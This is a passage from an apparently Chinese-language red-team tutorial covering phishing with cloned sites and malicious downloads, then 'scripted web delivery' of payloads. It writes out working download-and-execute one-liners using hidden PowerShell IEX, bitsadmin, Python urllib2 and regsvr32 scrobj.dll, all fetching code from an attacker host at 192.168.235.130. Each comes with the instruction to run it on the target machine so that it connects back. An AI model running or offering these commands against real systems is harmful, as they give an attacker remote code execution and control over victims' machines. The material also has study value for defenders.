4.6 屏幕截图
4.7 凭证信息
5. 钓鱼攻击
5.1 克隆网站
5.2 下载文件
选择一个恶意文件直接加载,下载的时候会下载该文件。
5.3 脚本web传递
5.3.1 powershell
生成的脚本如下
powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring('http://192.168.235.130:80/a'))"
直接在目标机器上执行该脚本
上线
5.3.2 bitsadmin
生成的脚本如下所示:
cmd.exe /c bitsadmin /transfer 5cc3 http://192.168.235.130:80/b %APPDATA%\5cc3.exe&%APPDATA%\5cc3.exe&del%APPDATA%\5cc3.exe
在目标机器上执行该脚本
上线
5.3.3 Python
生成的Payload如下:
python -c "import urllib2; exec urllib2.urlopen('http://192.168.235.130:80/c').read();"
在目标服务器上执行该脚本
5.3.4 Regsrv32
生成脚本如下:
regsvr32 /s /n /u /i:http://192.168.235.130:80/e scrobj.dll
5.4 信息收集
5.4.1 实践
直接访问http://192.168.235.130就可以收集主机相关信息
访问以后,收集到的信息如下所示:
5.4.2 原理
分析生成网站的源码发现,其在网站源代码里植入了JS脚本,相应脚本如下所示:
